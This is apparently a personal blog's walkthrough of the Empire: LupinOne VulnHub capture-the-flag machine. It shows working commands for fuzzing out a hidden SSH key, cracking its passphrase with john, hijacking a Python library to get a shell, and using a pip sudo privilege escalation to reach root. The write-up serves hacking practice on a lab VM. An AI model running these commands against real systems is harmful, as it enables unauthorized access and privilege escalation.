Book of Eopi
  • 😍About the Author
  • πŸ€–ChatGPT for Cybersecurity
  • πŸ“˜CERTIFICATIONS
    • Certified Ethical Hacker (C|EH)(Practical)
      • Reconnaissance (Footprinting)
      • Scanning Networks
      • Vulnerability Analysis
      • System Hacking
      • Sniffing
      • SQL Injection
      • Remote code execution
      • Hacking Web Applications & Servers
        • Local and remote file inclusion
        • File upload bypass
        • Cross-site scripting
        • Cross-site request forgery
        • Server-side request forgery
      • Exploitation
        • Working with exploits
        • Password cracking
        • Metasploit
        • Buffer overflow
      • Cloud Computing
      • Cryptography
      • Mobile Pentesting Resources
      • Learning resources
  • 🏁My Hacking Materials
    • My Most Frequently Used Hacking Commands
    • RickdiculouslyEasy: 1 VulnHub WriteUp
    • Corrosion: 2 VulnHub WriteUp
    • Hackable: 3 VulnHub WriteUp
    • Empire: LupinOne Vulnhub WriteUp
  • 🐧101 Labs for Linux
    • πŸ’»Hardware and System Configuration
      • LAB 1 - Boot Sequence
  • πŸ”§Mod Nintendo Switch Game
    • πŸ”ΉPokΓ©mon Brilliant Diamond and Shining Pearl
      • πŸŸ₯Install mods on Nintendo Switch
      • 🟦Install mods on Yuzu/Ryujinx Emulator
      • πŸ” Custom font for PokΓ©mon BDSP
  • πŸ“–SHARE TΓ€I LIỆU NVSP
    • 1️⃣HỌC PHαΊ¦N 1
    • 2️⃣HỌC PHαΊ¦N 2
    • 3️⃣HỌC PHαΊ¦N 3
    • 4️⃣HỌC PHαΊ¦N 4
    • 5️⃣HỌC PHαΊ¦N 5 (chΖ°a hoΓ n thiện)
    • 6️⃣HỌC PHαΊ¦N 6
  • βš”οΈTα»•ng Hợp VΓ΅ LΓ’m 2
    • πŸ’°Server JX2 2014 - BαΊ£n Kinh Doanh
    • πŸ‘‘Server JX2 2014 - PhiΓͺn bαΊ£n Offline
    • πŸ‘‘Server JX2 2017 - PhiΓͺn BαΊ£n Offline
    • πŸ‘‘Server JX2 2021 - PhiΓͺn BαΊ£n Offline
Powered by GitBook
On this page
  • Download
  • Pentesting Methodology
  • Network Scanning
  • Enumeration
  • Exploitation
  • Privilege Escalation
  1. My Hacking Materials

Empire: LupinOne Vulnhub WriteUp

Walkthrough for Empire LupinOne in VulnHub

PreviousHackable: 3 VulnHub WriteUpNext101 Labs for Linux

Last updated 2 years ago

Empire: LupinOne is a Vulnhub easy-medium machine designed by icex64 and Empire Cybersecurity. This lab is appropriate for seasoned CTF players who want to put their skills to the test.

Download

  • 01-Empire-Lupin-One.zip (Size: 922 MB)

Pentesting Methodology

Network Scanning

  • netdiscover

  • nmap

Enumeration

  • abusing HTTP

  • fuzzing

Exploitation

  • john

  • ssh

Privilege Escalation

  • linpeas

  • python library hijacking

  • pip

  • root flag

Level: Easy-Medium

Network Scanning

To begin, we must use the netdiscover command to scan the network for the IP address of the victim machine.

To move forward in this process, we are launching Nmap.

nmap -sC -sV 192.168.1.2

We have, according to the nmap output:

  • on port 22 there is an SSH server.

  • an HTTP service (Apache Server) running on port 80, as well as a /~myfiles

Enumeration

We began the enumeration procedure by inspecting the (/~myfiles) HTTP page. Discovered an Error 404, which seemed suspicious.

http://192.168.1.2/~myfiles/

We looked at the view page source and found comment β€œyou can do it, keep trying”.

As a result, we use fuzzing to gain some additional information from this case. We made use of ffuf and we obtained a directory (secret).

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.1.2/~FUZZ'

Take a good look at that secret directory and analyses that here author is sharing some information related to SSH private key file related to user β€œicex64” that we need to fuzz.

To find that secret private ssh key, we again use fuzzing with the help of ffuf once more and found text file (mysecret.txt).

ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'http://192.168.1.2/~secret/.FUZZ' -fc 403 -e .txt,.html

We explore mysecret.txt with a web browser. It appears to be a private ssh key, but it is encoded. We thoroughly examined this key and discovered that it is encoded in base 58.

http://192.168.1.2./~secret/.mysecret.txt

Simply enter your data in the form below, click the Base-58 Decode button, and you’ll be presented with a base-58 encoded string. We obtained our ssh-key after decoding it.

Exploitation

Since the author has share some hint related to passphrase for SSH Key, thus we are using ssh2john to obtain the hash value of the ssh-key.

locate ssh2john
/usr/share/john/ssh2john.py sshkey > hash

Now, use john to crack the hash value.

john --wordlist=/usr/share/wordlists/fastrack.txt hash

In a few seconds, Bingo!! We obtained the ssh-key password (P@55w0rd!).

We have all of the requirements for ssh login. Use our icex64 username, ssh-key, and cracked password (P@55w0rd!).

ssh -i sshkey icex64@192.168.1.2

Bang!! We used the icex64 user to connect to ssh. We promptly verified this user’s access and discovered that a Python file was running. We promptly examined that file and discovered that it could be exploited using the Python Library Hijacking approach.

sudo -l
cat /home/arsene/heist.py

Privilege Escalation

We’ve started the process of escalating privileges. To begin with the Python Library Hijacking technique, we must first determine the coordinates of webbrowser.py. That’s why we’re employing the linpeas script.

python -m SimpleHTTPServer 80

Now we’ll switch to the icex64 terminal. We moved the directory to /tmp directory and imported the Linpeas script from Kali Linux using the wget function.

cd /tmp
wget 192.168.1.3/linpeas.sh

Then we granted the script the ALL permissions. Then we ran it right away.

chmod 777 linpeas.sh
./linpeas.sh

We obtained the location of the Python file in a matter of seconds (webbrowser.py).

To operate this python file, we utilised the nano command and edit the script to call /bin/bash code into it.

os.system ("/bin/bash")

After all of this effort, we ran the sudo command in conjunction with the coordinates specified in the permissions check on icex64. To switch the user icex64 to arsene.

sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

We got the user arsene and checked this user SUDO permissions and found user has privilege to execute pip binary as root without atuthentication. We have an idea to do pip privilege escalation after evaluating a few more moments.

sudo -l

To conduct pip privilege escalation, we only need to run these three commands.

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

Yippee!! Finally, we have the root; simply use the id command to check. It has been proven that it is root; simply change the directory to root. Congo!! We obtained the root flag.

This is how we’ll get at the machine’s shell. It was a terrific exercise, and it was a lot of fun to cheer for the winners. To comprehend many scenarios, it is required to try once.

Download (Mirror):

We looked up a base 58 decoder online and were met with . It is the most basic online base-58 decoder for web developers and programmers.

We’ve previously downloaded the Linpeas script from git . Now we just navigate to that directory and launch a basic Python http server.

We can now begin our Python Library Hijacking procedure where an attacker is introduced into a python-enabled environment, you can learn more about this strategy by clicking .

We used the gtfobin instructions provided to conduct pip privilege escalation. If the programme is allowed to run as superuser by sudo, it retains its elevated rights and can be used to access the file system, escalate, or keep privileged access.

Author: Eopi Noriko is a passionate Cybersecurity Researcher, contact .

🏁
https://download.vulnhub.com/empire/01-Empire-Lupin-One.zip
browserling
page
here
here
Facebook
Every lab, every wallpaper